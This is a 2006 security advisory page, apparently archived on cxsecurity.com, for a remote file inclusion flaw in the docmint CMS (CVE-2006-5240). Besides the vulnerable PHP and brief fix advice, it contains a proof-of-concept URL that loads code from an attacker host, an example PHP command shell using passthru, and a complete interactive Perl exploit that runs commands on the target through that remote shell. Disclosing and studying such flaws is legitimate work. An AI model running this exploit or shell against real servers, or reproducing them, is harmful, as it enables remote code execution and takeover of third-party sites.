docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Vulnerability

2006.10.13
Credit: M.Hasran Addahroni
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-5240
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

ECHO_ADV_51$2006 ------------------------------------------------------------------------ ----------------- [ECHO_ADV_51$2006] docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Vulnerability ------------------------------------------------------------------------ ----------------- Author : M.Hasran Addahroni Date : Oct, 9th 2006 Location : Australia, Sydney Web : http://advisories.echo.or.id/adv/adv51-K-159-2006.txt Critical Lvl : Dangerous ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : docmint version : <= 2.0 URL : http://www.docmint.net Description : Docmint is not a Wiki system. Docmint is a small, multilingual CMS developed initially for online user manuals - like the one you are looking at. It features user comments, full text search, templated and customizable front end layout with example skins, code highlighting, fully localizable admin and public interface, file upload and attachment, image inclusion in the articles, a tree structure for articles, an easy install script, full Unicode-8 support as well as an import function from structured HTML documents, topped with a WYSIWYSG editor in the admin interface. In short: Docmint was developed after an endless search for a simple version of the beloved functionality of the PHP.net website. The results you are looking at right now, published under GNU/GPL. Docmint has a number of XML import and export functionality for migrating and backing up content as well as language packs. It currently also features the possibility of importing HTML documents generated from OpenOffice or Word into the database, using the level number of the header tags as the underlying structure for the document tree ------------------------------------------------------------------------ --- Proof of Concept: ~~~~~~~~~~~~~~ Vulnerable Script engine/required.php . ---------------required.php-------------------------------- ... include_once "register_globals.php"; // one definite include so that we have the file functions for further include loops include_once($MY_ENV['BASE_ENGINE_LOC']."/lib"."/func.files.php"); //include_once all the php files in the core lib folder $libfiles = get_files($MY_ENV['BASE_ENGINE_LOC']."/lib", "php"); // look for php files in the lib folder foreach ($libfiles as $libfile) { $includefile = $MY_ENV['BASE_ENGINE_LOC']."/lib"."/$libfile"; include_once($includefile); ... ------------------------------------------------------------------ Variables $MY_ENV['BASE_ENGINE_LOC'] are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~~~~~~~~~~ http://www.target.com/[docmint_path]/engine/require.php?MY_ENV[BASE_ENGI NE_LOC]=http://attacker.com/evil? Solution: ~~~~~~~ - Sanitize variable $MY_ENV['BASE_ENGINE_LOC'] on affected files. - Turn off register_globals Notification: ~~~~~~~~~~ vendor not contact yet ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ ping - my dearest wife, for all the luv the tears n the breath ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl aw ~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit, x16 ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: http://k-159.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------- Perl Exploit: ~~~~~~~~~~ #!/usr/bin/perl ## # docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit # Bug Found & code By K-159 ## # echo.or.id (c) 2006 # ## # usage: # perl docmint.pl <target> <cmd shell location> <cmd shell variable> # # perl docmint.pl http://target.com/ http://site.com/cmd.txt cmd # # cmd shell example: <?passthru($_GET[cmd]);?> # # cmd shell variable: ($_GET[cmd]); ## # # #Greetz: My Dearest Wife - ping, echo|staff (y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative), SinChan, sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16, mbahngarso, etc # # Contact: www.echo.or.id #e-c-h-o @irc.dal.net ## use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()} head(); while() { print "[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Path.'engine/require.php?MY_ENV[BASE_ENGINE_LOC]='.$Pathtocmd.'?&'.$c mdv.'='.$cmd)or die "nCould Not connectn"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[n]/[&#195;&#402;.&#195;&#8218;&#170;]/; if (!$cmd) {print "nPlease Enter a Commandnn"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) {print "nCould Not Connect to cmd Host or Invalid Command Variablen";exit} elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No Returnnn"} if($return =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[&#195;&#402;.&#195;&#8218;&#170;]/[n]/; print "rn$finreturnnr"; last; } else {print "[shell] $";}}}last; sub head() { print "n===================================================================== =======rn"; print " *docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit*rn"; print "======================================================================= =====rn"; } sub usage() { head(); print " Usage: perl docmint.pl <target> <cmd shell location> <cmd shell variable>rnn"; print " <Site> - Full path to docmint ex: http://www.site.com/ rn"; print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt rn"; print " <cmd variable> - Command variable used in php shell rn"; print "======================================================================= =====rn"; print " Bug Found by K-159 rn"; print " www.echo.or.id #e-c-h-o irc.dal.net 2006 rn"; print "======================================================================= =====rn"; exit(); }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top